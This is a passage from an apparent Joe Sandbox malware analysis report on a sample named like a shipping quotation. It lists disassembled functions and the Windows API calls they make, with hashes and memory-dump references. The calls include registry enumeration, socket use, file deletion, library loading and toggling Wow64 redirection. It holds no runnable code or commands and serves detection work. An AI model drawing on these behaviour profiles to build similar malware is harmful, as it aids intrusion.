                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseExecuteHandleProcessShell
                                                                            • String ID: <$@
                                                                            • API String ID: 1279613386-1426351568
                                                                            • Opcode ID: d62d0735b61ada89191d43ba765424c2c22707097463707079a2125271948008
                                                                            • Instruction ID: 66c3180b962e26fe50efd90d33ff5f7bb5ad55639e633ca268ffe27dd56965a6
                                                                            • Opcode Fuzzy Hash: d62d0735b61ada89191d43ba765424c2c22707097463707079a2125271948008
                                                                            • Instruction Fuzzy Hash: D67168B1A00619DFCB14DF94C484A9EBBF2BF08310F04849DE856AB362CB75ED85CB95
                                                                            Function 0069B5C8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 0069B5FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: 7cbc884e18f77e45905497da1278124d50ddd016476e84ee6256c472e9406c1c
                                                                            • Instruction ID: b5daca5d8228c380b7aa1f0dd51154e1ba2d69bbd354330c94cc6f2a03d3bd0b
                                                                            • Opcode Fuzzy Hash: 7cbc884e18f77e45905497da1278124d50ddd016476e84ee6256c472e9406c1c
                                                                            • Instruction Fuzzy Hash: 9241F832A000269BCF106F7DDE905FE7BABAFA1754B245229E421DB784E731ED81C790
                                                                            Function 0069719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00697206
                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0069723C
                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0069724D
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006972CF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: 0c3bc331a6105f36d0c694b402ea4dc780510cff346b17d9f11db257aa0ebde6
                                                                            • Instruction ID: 4cd26c8b32087e9b193c6646c5f30a94cd99158c0e9e38bd41f08aa237d634de
                                                                            • Opcode Fuzzy Hash: 0c3bc331a6105f36d0c694b402ea4dc780510cff346b17d9f11db257aa0ebde6
                                                                            • Instruction Fuzzy Hash: 35415071624204DFDF15CF54C884AAA7BAEEF44710F1580AEFD059F60AD7B1DA45CBA0
                                                                            Function 006C3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006C3E35
                                                                            • IsMenu.USER32(?), ref: 006C3E4A
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006C3E92
                                                                            • DrawMenuBar.USER32 ref: 006C3EA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                            • String ID: 0
                                                                            • API String ID: 3076010158-4108050209
                                                                            • Opcode ID: bb8ff13b504074f6c8578c2cf0bbb934bf561a9a054455e002b24f879c0f6284
                                                                            • Instruction ID: 9dee71c912b263ac9a2af47afd5c9ae5a975eecd0bc74769b1946efcbc93be03
                                                                            • Opcode Fuzzy Hash: bb8ff13b504074f6c8578c2cf0bbb934bf561a9a054455e002b24f879c0f6284
                                                                            • Instruction Fuzzy Hash: 51413675A00219EFDB10DF50D884EEABBBAFF49364F04816EE905A7350D730AE55CBA0
                                                                            Function 00691DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00691E66
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00691E79
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00691EA9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 787153527-1403004172
                                                                            • Opcode ID: 21e00dfe6b573b271531748ad26f126cdf42d8a8aed7d03ecdbd9245c27d1f05
                                                                            • Instruction ID: 8248cf6d09054c5d7a1f1116d797c65019e0748587fa4bbecdaf7a6e5d5c924a
                                                                            • Opcode Fuzzy Hash: 21e00dfe6b573b271531748ad26f126cdf42d8a8aed7d03ecdbd9245c27d1f05
                                                                            • Instruction Fuzzy Hash: EC212671A00104BADF149B60CC45CFFBBBFDF42360F20411DF815A76E0DB7449068A60
                                                                            Function 006C2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006C2F8D
                                                                            • LoadLibraryW.KERNEL32(?), ref: 006C2F94
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006C2FA9
                                                                            • DestroyWindow.USER32(?), ref: 006C2FB1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 3529120543-1011021900
                                                                            • Opcode ID: 07d4307deba13bea37ee4488ac1d84233332dd8eb16b93c5807c3651ff06f828
                                                                            • Instruction ID: 02b0680ea10bbeeac24aa83e116a62b871f01c0efa7951e08d7e2adf6b7dba67
                                                                            • Opcode Fuzzy Hash: 07d4307deba13bea37ee4488ac1d84233332dd8eb16b93c5807c3651ff06f828
                                                                            • Instruction Fuzzy Hash: 2E21DC7124020AABEB208F64DCA0FBB37BEEB58324F10521CFE20D2290C731DC419760
                                                                            Function 00654D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00654D1E,006628E9,?,00654CBE,006628E9,006F88B8,0000000C,00654E15,006628E9,00000002), ref: 00654D8D
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00654DA0
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00654D1E,006628E9,?,00654CBE,006628E9,006F88B8,0000000C,00654E15,006628E9,00000002,00000000), ref: 00654DC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: 12a3d9d8d89b54efab13fe1a1b2fb60884e2a4f6a6153048c09efe9935282582
                                                                            • Instruction ID: bff3eba58b4085affde322c26a6174dfe9fca2e136bd60adc35fe8cd9005cb71
                                                                            • Opcode Fuzzy Hash: 12a3d9d8d89b54efab13fe1a1b2fb60884e2a4f6a6153048c09efe9935282582
                                                                            • Instruction Fuzzy Hash: 68F04434940208BBEB115F95DC49FEDBFB6EF44766F040195FC09A6650CF315984CA90
                                                                            Function 00634E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00634EDD,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E9C
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00634EAE
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00634EDD,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634EC0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 145871493-3689287502
                                                                            • Opcode ID: d48e710edfdf4c339f571d78b4a2bb2318ab1331c2af5cd9ebac66d5b55353b0
                                                                            • Instruction ID: df61961f3e8c086b1c0dd2f398b967eedef4a1db5b6fa47ac07470d7c19f382b
                                                                            • Opcode Fuzzy Hash: d48e710edfdf4c339f571d78b4a2bb2318ab1331c2af5cd9ebac66d5b55353b0
                                                                            • Instruction Fuzzy Hash: 4FE08635E016225BD32117266C18FBBA556AFC1B72B090115FD08D2310DF60DD0640E0
                                                                            Function 00634E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00673CDE,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E62
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00634E74
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00673CDE,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E87
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 145871493-1355242751
                                                                            • Opcode ID: e089f4cbdade61bd638d4c740e834c0cd9f93432cf2a0605961d081a0f861985
                                                                            • Instruction ID: 53bf2c0137099204c53f70a7ee919b3d965e6e5990f9f9ab50b94ddb1a7750cc
                                                                            • Opcode Fuzzy Hash: e089f4cbdade61bd638d4c740e834c0cd9f93432cf2a0605961d081a0f861985
                                                                            • Instruction Fuzzy Hash: AFD0123690263157D7221B66AC18EEBAA1BAF85F7170A0515F909A2214CF60DD0285D0
                                                                            Function 006A2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006A2C05
                                                                            • DeleteFileW.KERNEL32(?), ref: 006A2C87
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006A2C9D
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006A2CAE
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006A2CC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$Copy
                                                                            • String ID:
                                                                            • API String ID: 3226157194-0
                                                                            • Opcode ID: 02b52eb85161459762f0a4f35a8227dde6c0a4389934c860cabd91eb5d831a4e
                                                                            • Instruction ID: 97108c9013a8c8f7c06decbddf28f172b97ecbc5452f9b9c4768af79dd7f90a9
                                                                            • Opcode Fuzzy Hash: 02b52eb85161459762f0a4f35a8227dde6c0a4389934c860cabd91eb5d831a4e
                                                                            • Instruction Fuzzy Hash: 2FB15071900119ABDF55EBA8CC95EDEB7BEEF09310F1040AAF609E7141EB319E448FA5
                                                                            Function 006B1C60 Relevance: 7.8, APIs: 5, Instructions: 298networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006B1DC0
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006B1DE1
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1DF2
                                                                            • inet_ntoa.WSOCK32(?), ref: 006B1E8C
                                                                              • Part of subcall function 006B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,006AEC0C), ref: 006B3240
                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 006B1EDB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 3163710072-0
                                                                            • Opcode ID: 414f3fbe6bb35b74f870f8dcdcd50c1e9453f3f1411525f7d92557b0abcdb807
                                                                            • Instruction ID: 06095bc30081319ad430beb5c65667d77153f976831708c0a1e299c37e3d90f6
                                                                            • Opcode Fuzzy Hash: 414f3fbe6bb35b74f870f8dcdcd50c1e9453f3f1411525f7d92557b0abcdb807
                                                                            • Instruction Fuzzy Hash: 59B1C170204300AFD324DF24C895EAA7BEAAF85318F94854CF5565F3A2CB71ED86CB91
                                                                            Function 00671522 Relevance: 7.8, APIs: 5, Instructions: 268COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,006717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 006715CE
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00671651
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,006717FB,?,006717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006716E4
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006716FB
                                                                              • Part of subcall function 00663820: RtlAllocateHeap.NTDLL(00000000,?,00701444,?,0064FDF5,?,?,0063A976,00000010,00701440,006313FC,?,006313C6,?,00631129), ref: 00663852
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00671777
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                                            • String ID:
                                                                            • API String ID: 1443698708-0
                                                                            • Opcode ID: 0df51417af9b5813fb6401ce84c0beae384576a3b60e01fa735e3b98577f2ee7
                                                                            • Instruction ID: 1c63d46d7ca5a77707fdd51a49ecaac6c469869d59cf21c8202a96a5a9418af5
                                                                            • Opcode Fuzzy Hash: 0df51417af9b5813fb6401ce84c0beae384576a3b60e01fa735e3b98577f2ee7
                                                                            • Instruction Fuzzy Hash: 899185B1E002169AEF288E7CC851EEE7BB79F46710F18865AE809EF241D735DD45C7A0
                                                                            Function 006BA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 006BA427
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006BA435
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006BA468
                                                                            • CloseHandle.KERNEL32(?), ref: 006BA63D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 3488606520-0
                                                                            • Opcode ID: 817498cffa1929d056c3bde153c0e61ead07f625902236022e3751eab22bc60f
                                                                            • Instruction ID: 9183ffc3e831ca95438ba75a79ccd72ea26faf2e73272bc7939c0435db3b9434
                                                                            • Opcode Fuzzy Hash: 817498cffa1929d056c3bde153c0e61ead07f625902236022e3751eab22bc60f
                                                                            • Instruction Fuzzy Hash: A9A1A4B16043009FD760DF14C886F6AB7E6AF84714F14885DF5999B392D770EC41CB95
                                                                            Function 006BB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BBAA5
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006BBB00
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006BBB63
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 006BBBA6
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BBBB3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3740051246-0
                                                                            • Opcode ID: 80f30424bdfd9a77a791a61b290575fdbd07a37157c0d61ef549f78ab2e4021f
                                                                            • Instruction ID: a5bb57caa4bfd6e035dfec3957e6f994a022e2b0ef5089e4bfd1033e6e65f162
                                                                            • Opcode Fuzzy Hash: 80f30424bdfd9a77a791a61b290575fdbd07a37157c0d61ef549f78ab2e4021f
                                                                            • Instruction Fuzzy Hash: 6A61A371208241AFD714DF14C890EAABBE6FF84318F14995CF4994B2A2DB71ED85CB92
                                                                            Function 00698BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00698BCD
                                                                            • VariantClear.OLEAUT32 ref: 00698C3E
                                                                            • VariantClear.OLEAUT32 ref: 00698C9D
                                                                            • VariantClear.OLEAUT32(?), ref: 00698D10
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00698D3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
